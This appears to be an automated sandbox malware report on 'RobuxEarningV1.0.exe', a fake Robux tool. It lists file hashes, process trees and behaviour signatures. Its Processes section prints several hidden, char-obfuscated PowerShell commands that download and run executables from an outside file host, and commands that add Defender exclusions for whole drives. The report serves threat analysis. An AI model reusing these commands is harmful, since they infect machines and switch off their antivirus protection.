Analysis
-
max time kernel
119s -
max time network
121s -
platform
windows7_x64 -
resource
win7-20241010-en -
resource tags
arch:x64arch:x86image:win7-20241010-enlocale:en-usos:windows7-x64system -
submitted
07/03/2025, 18:55
Static task
static1
Behavioral task
behavioral1
Sample
RobuxEarningV1.0.exe
Resource
win7-20241010-en
Behavioral task
behavioral2
Sample
RobuxEarningV1.0.exe
Resource
win10v2004-20250217-en
General
-
Target
RobuxEarningV1.0.exe
-
Size
6.8MB
-
MD5
40e4949832835252d7c13f380a7e34e8
-
SHA1
40413f428911437631362398426b2f2accccaefe
-
SHA256
96a6c1b696660babb99a2de8c47464de947a11c8982277a86fb3814c6c22ada9
-
SHA512
7160d5701d809c6b7bee228f162dab0960a6f300e0428bc3176fca508ecbcad8841b0f663164cb6f08f6db7816af93879a6c08ecc2fd0877e2db84764e018523
-
SSDEEP
98304:4Clb/EOLQw+R0jtL0er+6HMh1igAyKl7MIEGYPkqQMcTVfrrt5pQ:4iAOw0jxNMh1xakPkmcNK
Malware Config
Signatures
-
Command and Scripting Interpreter: PowerShell 1 TTPs 18 IoCs
Run Powershell and hide display window.
pid Process 2880 powershell.exe 332 powershell.exe 1952 powershell.exe 2076 powershell.exe 1632 powershell.exe 2880 powershell.exe 332 powershell.exe 1952 powershell.exe 2076 powershell.exe 1632 powershell.exe 2044 powershell.exe 1296 powershell.exe 2688 powershell.exe 668 powershell.exe 2336 powershell.exe 1332 powershell.exe 1376 powershell.exe 3056 powershell.exe -
Executes dropped EXE 2 IoCs
pid Process 2812 -.exe 2280 -.exe -
Loads dropped DLL 2 IoCs
pid Process 2448 RobuxEarningV1.0.exe 2280 -.exe -
Detects Pyinstaller 1 IoCs
resource yara_rule behavioral1/files/0x00070000000120fc-4.dat pyinstaller -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 13 IoCs
pid Process 2880 powershell.exe 332 powershell.exe 1952 powershell.exe 2076 powershell.exe 1632 powershell.exe 3056 powershell.exe 2044 powershell.exe 1296 powershell.exe 2688 powershell.exe 668 powershell.exe 2336 powershell.exe 1332 powershell.exe 1376 powershell.exe -
Suspicious use of AdjustPrivilegeToken 13 IoCs
description pid Process Token: SeDebugPrivilege 2880 powershell.exe Token: SeDebugPrivilege 332 powershell.exe Token: SeDebugPrivilege 1952 powershell.exe Token: SeDebugPrivilege 2076 powershell.exe Token: SeDebugPrivilege 1632 powershell.exe Token: SeDebugPrivilege 3056 powershell.exe Token: SeDebugPrivilege 2044 powershell.exe Token: SeDebugPrivilege 1296 powershell.exe Token: SeDebugPrivilege 2688 powershell.exe Token: SeDebugPrivilege 668 powershell.exe Token: SeDebugPrivilege 2336 powershell.exe Token: SeDebugPrivilege 1332 powershell.exe Token: SeDebugPrivilege 1376 powershell.exe -
Suspicious use of WriteProcessMemory 57 IoCs
description pid Process procid_target PID 2448 wrote to memory of 2812 2448 RobuxEarningV1.0.exe 30 PID 2448 wrote to memory of 2812 2448 RobuxEarningV1.0.exe 30 PID 2448 wrote to memory of 2812 2448 RobuxEarningV1.0.exe 30 PID 2448 wrote to memory of 2708 2448 RobuxEarningV1.0.exe 32 PID 2448 wrote to memory of 2708 2448 RobuxEarningV1.0.exe 32 PID 2448 wrote to memory of 2708 2448 RobuxEarningV1.0.exe 32 PID 2708 wrote to memory of 2880 2708 cmd.exe 34 PID 2708 wrote to memory of 2880 2708 cmd.exe 34 PID 2708 wrote to memory of 2880 2708 cmd.exe 34 PID 2812 wrote to memory of 2280 2812 -.exe 35 PID 2812 wrote to memory of 2280 2812 -.exe 35 PID 2812 wrote to memory of 2280 2812 -.exe 35 PID 2708 wrote to memory of 332 2708 cmd.exe 36 PID 2708 wrote to memory of 332 2708 cmd.exe 36 PID 2708 wrote to memory of 332 2708 cmd.exe 36 PID 2708 wrote to memory of 1952 2708 cmd.exe 37 PID 2708 wrote to memory of 1952 2708 cmd.exe 37 PID 2708 wrote to memory of 1952 2708 cmd.exe 37 PID 2708 wrote to memory of 2076 2708 cmd.exe 38 PID 2708 wrote to memory of 2076 2708 cmd.exe 38 PID 2708 wrote to memory of 2076 2708 cmd.exe 38 PID 2708 wrote to memory of 1632 2708 cmd.exe 39 PID 2708 wrote to memory of 1632 2708 cmd.exe 39 PID 2708 wrote to memory of 1632 2708 cmd.exe 39 PID 2708 wrote to memory of 2832 2708 cmd.exe 40 PID 2708 wrote to memory of 2832 2708 cmd.exe 40 PID 2708 wrote to memory of 2832 2708 cmd.exe 40 PID 2832 wrote to memory of 3028 2832 cmd.exe 41 PID 2832 wrote to memory of 3028 2832 cmd.exe 41 PID 2832 wrote to memory of 3028 2832 cmd.exe 41 PID 2832 wrote to memory of 3040 2832 cmd.exe 42 PID 2832 wrote to memory of 3040 2832 cmd.exe 42 PID 2832 wrote to memory of 3040 2832 cmd.exe 42 PID 2708 wrote to memory of 3056 2708 cmd.exe 43 PID 2708 wrote to memory of 3056 2708 cmd.exe 43 PID 2708 wrote to memory of 3056 2708 cmd.exe 43 PID 2708 wrote to memory of 2044 2708 cmd.exe 44 PID 2708 wrote to memory of 2044 2708 cmd.exe 44 PID 2708 wrote to memory of 2044 2708 cmd.exe 44 PID 2708 wrote to memory of 1296 2708 cmd.exe 45 PID 2708 wrote to memory of 1296 2708 cmd.exe 45 PID 2708 wrote to memory of 1296 2708 cmd.exe 45 PID 2708 wrote to memory of 2688 2708 cmd.exe 46 PID 2708 wrote to memory of 2688 2708 cmd.exe 46 PID 2708 wrote to memory of 2688 2708 cmd.exe 46 PID 2708 wrote to memory of 668 2708 cmd.exe 47 PID 2708 wrote to memory of 668 2708 cmd.exe 47 PID 2708 wrote to memory of 668 2708 cmd.exe 47 PID 2708 wrote to memory of 2336 2708 cmd.exe 48 PID 2708 wrote to memory of 2336 2708 cmd.exe 48 PID 2708 wrote to memory of 2336 2708 cmd.exe 48 PID 2708 wrote to memory of 1332 2708 cmd.exe 49 PID 2708 wrote to memory of 1332 2708 cmd.exe 49 PID 2708 wrote to memory of 1332 2708 cmd.exe 49 PID 2708 wrote to memory of 1376 2708 cmd.exe 50 PID 2708 wrote to memory of 1376 2708 cmd.exe 50 PID 2708 wrote to memory of 1376 2708 cmd.exe 50
Processes
-
C:\Users\Admin\AppData\Local\Temp\RobuxEarningV1.0.exe"C:\Users\Admin\AppData\Local\Temp\RobuxEarningV1.0.exe"1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2448 -
C:\ProgramData\-.exe"C:\ProgramData\-.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2812 -
C:\ProgramData\-.exe"C:\ProgramData\-.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2280
-
-
-
C:\Windows\system32\cmd.execmd /c ""C:\ProgramData\SecorKit.bat" "2⤵
- Suspicious use of WriteProcessMemory
PID:2708 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowerShell -WindowStyle Hidden -Command "$url='';$url+=([char]104);$url+=([char]116);$url+=([char]116);$url+=([char]112);$url+=([char]115);$url+=([char]58);$url+=([char]47);$url+=([char]47);$url+=([char]102);$url+=([char]105);$url+=([char]108);$url+=([char]101);$url+=([char]115);$url+=([char]46);$url+=([char]99);$url+=([char]97);$url+=([char]116);$url+=([char]98);$url+=([char]111);$url+=([char]120);$url+=([char]46);$url+=([char]109);$url+=([char]111);$url+=([char]101);$url+=([char]47);$url+=([char]53);$url+=([char]53);$url+=([char]98);$url+=([char]117);$url+=([char]117);$url+=([char]104);$url+=([char]46);$url+=([char]115);$url+=([char]101);$url+=([char]99);$url+=([char]114);$url+=([char]111);$url+=([char]48);$url+=([char]52);$url+=([char]57);$url+=([char]48);$url+=([char]56);$url+=([char]51);$url+=([char]55);$url+=([char]53);$url+=([char]48);$output=\"$env:PUBLIC\svchost.exe\";Invoke-WebRequest -Uri $url -OutFile $output;Start-Process -FilePath $output -Wait3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2880
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowerShell -WindowStyle Hidden -Command "$url='';$url+=([char]0x68);$url+=([char]0x74);$url+=([char]0x74);$url+=([char]0x70);$url+=([char]0x73);$url+=([char]0x3a);$url+=([char]0x2f);$url+=([char]0x2f);$url+=([char]0x66);$url+=([char]0x69);$url+=([char]0x6c);$url+=([char]0x65);$url+=([char]0x73);$url+=([char]0x2e);$url+=([char]0x63);$url+=([char]0x61);$url+=([char]0x74);$url+=([char]0x62);$url+=([char]0x6f);$url+=([char]0x78);$url+=([char]0x2e);$url+=([char]0x6d);$url+=([char]0x6f);$url+=([char]0x65);$url+=([char]0x2f);$url+=([char]0x35);$url+=([char]0x35);$url+=([char]0x62);$url+=([char]0x75);$url+=([char]0x75);$url+=([char]0x68);$url+=([char]0x2e);$url+=([char]0x73);$url+=([char]0x65);$url+=([char]0x63);$url+=([char]0x72);$url+=([char]0x6f);$url+=([char]0x30);$url+=([char]0x34);$url+=([char]0x39);$url+=([char]0x30);$url+=([char]0x38);$url+=([char]0x33);$url+=([char]0x37);$url+=([char]0x35);$url+=([char]0x30);$output=\"$env:PUBLIC\svchost.exe\";Invoke-WebRequest -Uri $url -OutFile $output;Start-Process -FilePath $output -Wait3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:332
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowerShell -WindowStyle Hidden -Command "$url0=''; $url0+=([char]104);$url0+=([char]116);$url0+=([char]116);$url0+=([char]112);$url0+=([char]115);$url0+=([char]58);$url0+=([char]47);$url0+=([char]47);$url0+=([char]102);$url0+=([char]105);$url0+=([char]108);$url0+=([char]101);$url0+=([char]115);$url0+=([char]46);$url0+=([char]99);$url0+=([char]97);$url0+=([char]116);$url0+=([char]98);$url0+=([char]111);$url0+=([char]120);$url0+=([char]46);$url0+=([char]109);$url0+=([char]111);$url0+=([char]101);$url0+=([char]47);$url0+=([char]99);$url0+=([char]102);$url0+=([char]117);$url0+=([char]111);$url0+=([char]105);$url0+=([char]56);$url0+=([char]46);$url0+=([char]102);$url0+=([char]117);$url0+=([char]107); $output=\"$env:PUBLIC\svhost0.exe\"; Invoke-WebRequest -Uri $url0 -OutFile $output; Start-Process -FilePath $output -Wait3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1952
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowerShell -WindowStyle Hidden -Command "$url1=''; $url1+=([char]104);$url1+=([char]116);$url1+=([char]116);$url1+=([char]112);$url1+=([char]115);$url1+=([char]58);$url1+=([char]47);$url1+=([char]47);$url1+=([char]102);$url1+=([char]105);$url1+=([char]108);$url1+=([char]101);$url1+=([char]115);$url1+=([char]46);$url1+=([char]99);$url1+=([char]97);$url1+=([char]116);$url1+=([char]98);$url1+=([char]111);$url1+=([char]120);$url1+=([char]46);$url1+=([char]109);$url1+=([char]111);$url1+=([char]101);$url1+=([char]47);$url1+=([char]110);$url1+=([char]56);$url1+=([char]110);$url1+=([char]117);$url1+=([char]103);$url1+=([char]51);$url1+=([char]46);$url1+=([char]102);$url1+=([char]117);$url1+=([char]99);$url1+=([char]107); $output=\"$env:PUBLIC\svhost1.exe\"; Invoke-WebRequest -Uri $url1 -OutFile $output; Start-Process -FilePath $output -Wait3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2076
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowerShell -WindowStyle Hidden -Command "$url2=''; $url2+=([char]104);$url2+=([char]116);$url2+=([char]116);$url2+=([char]112);$url2+=([char]115);$url2+=([char]58);$url2+=([char]47);$url2+=([char]47);$url2+=([char]102);$url2+=([char]105);$url2+=([char]108);$url2+=([char]101);$url2+=([char]115);$url2+=([char]46);$url2+=([char]99);$url2+=([char]97);$url2+=([char]116);$url2+=([char]98);$url2+=([char]111);$url2+=([char]120);$url2+=([char]46);$url2+=([char]109);$url2+=([char]111);$url2+=([char]101);$url2+=([char]47);$url2+=([char]104);$url2+=([char]98);$url2+=([char]108);$url2+=([char]50);$url2+=([char]105);$url2+=([char]103);$url2+=([char]46);$url2+=([char]115);$url2+=([char]101);$url2+=([char]99);$url2+=([char]114);$url2+=([char]111); $output=\"$env:PUBLIC\svhost2.exe\"; Invoke-WebRequest -Uri $url2 -OutFile $output; Start-Process -FilePath $output -Wait3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1632
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c mountvol | find ":"3⤵
- Suspicious use of WriteProcessMemory
PID:2832 -
C:\Windows\system32\mountvol.exemountvol4⤵PID:3028
-
-
C:\Windows\system32\find.exefind ":"4⤵PID:3040
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -c add-mppreference -exclusionpath MOUNTVOL3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3056
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -c add-mppreference -exclusionpath MOUNTVOL3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2044
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -c add-mppreference -exclusionpath MOUNTVOL3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1296
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -c add-mppreference -exclusionpath MOUNTVOL3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2688
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -c add-mppreference -exclusionpath Possible3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:668
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -c add-mppreference -exclusionpath C:\3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2336
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -c add-mppreference -exclusionpath F:\3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1332
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -c add-mppreference -exclusionpath D:\3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1376
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
4KB
MD516761e8a23d0d4a636ca414cc5b15d7a
SHA19ff21e1bed5aa608f170294e800812ebe3c7fbff
SHA256a52a64316c6c417abf09c36e60e2cfe492d051a5a696eeb3b1abb7c91c05734c
SHA5127ebb6376ed87e1deeed99aac5c6120e9a9224aaf0a853c61e8f09709d4038a60c28899e69bdf3b2c2657633da01ac335f80bc6e5ddef0b891739ab80b4258fb8
-
Filesize
5.5MB
MD565e381a0b1bc05f71c139b0c7a5b8eb2
SHA17c4a3adf21ebcee5405288fc81fc4be75019d472
SHA25653a969094231b9032abe4148939ce08a3a4e4b30b0459fc7d90c89f65e8dcd4a
SHA5124db465ef927dfb019ab6faec3a3538b0c3a8693ea3c2148fd16163bf31c03c899dfdf350c31457edf64e671e3cc3e46851f32f0f84b267535bebc4768ef53d39
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD58e7545e0cd2beac6afe4a94c06368d60
SHA1284367ca3761ca5fb45b3f9c7c0e5ca5df05a0e2
SHA256c4d6bf48bf4ec15a02394ea49d3352de9556c06c706c873f6def83483ac2b87e
SHA51213f46d57869cbff7435964bd77a98fffafa25a1369330ab18b4624c56cabadcd4d44d4d53d443e1c936ace2abc4ddb4182ca3d96470cc6458106dbc2accfccb3
-
Filesize
6.8MB
MD530e2452a76d6a5c739a2b1790a269c35
SHA1fb2f8ddfcf04e02effb15a2dd1a1e903871258e5
SHA25630abf86701b5915651ebcbc4f1c271fe8e4d3a3627826b253ccf20c304b258d9
SHA5123042b3abd47a5393fc31a3aef23a1ba26704d2e22242ec4ca9de0d2b8e71c6ad0361d7659eb58b88b1e6fae4f4459574d852e9804aeb91ed64d7b2bc931275ed